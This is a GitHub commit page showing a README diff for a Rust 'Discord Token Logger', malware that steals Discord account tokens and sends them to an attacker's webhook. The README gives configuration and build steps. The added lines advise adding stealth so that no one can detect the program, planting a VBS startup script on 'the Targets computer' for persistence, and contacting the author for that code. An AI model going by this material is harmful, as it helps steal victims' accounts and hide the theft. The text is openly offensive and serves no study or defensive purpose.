Skip to content

Commit 331b04a

Browse files
Update README.md
1 parent 8bceb01 commit 331b04a

File tree

1 file changed

+3
-2
lines changed

1 file changed

+3
-2
lines changed

README.md

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -9,6 +9,7 @@ A Discord Token Logger Written in Rust.
99
### Configuration
1010

1111
On line 11 in [main.rs](https://github.com/MasterOfBrokenLogic/DiscordTokenLogger/blob/main/src/main.rs) , replace the variable with your webhook URL from Discord.
12+
If you're unsure about what a Webhook URL is or how to obtain one, feel free to reach out to me on WhatsApp for assistance. I'm here to help, my friend!
1213

1314
```rust
1415
let url = "Discord Webhook URL";
@@ -20,5 +21,5 @@ To build this project just run:
2021
$ cargo build --target x86_64-pc-windows-gnu
2122
```
2223

23-
24-
Sidenote, I hate strings :3
24+
This is just a simple Token Logger, you can add more features for the stealth of the program, so no one can detect this. Create a vbs program in the Targets computer to run this project in the startup, If you need the vbs code to make this program to run in the startup, message me.
25+
I hate strings :3

0 commit comments

Comments
 (0)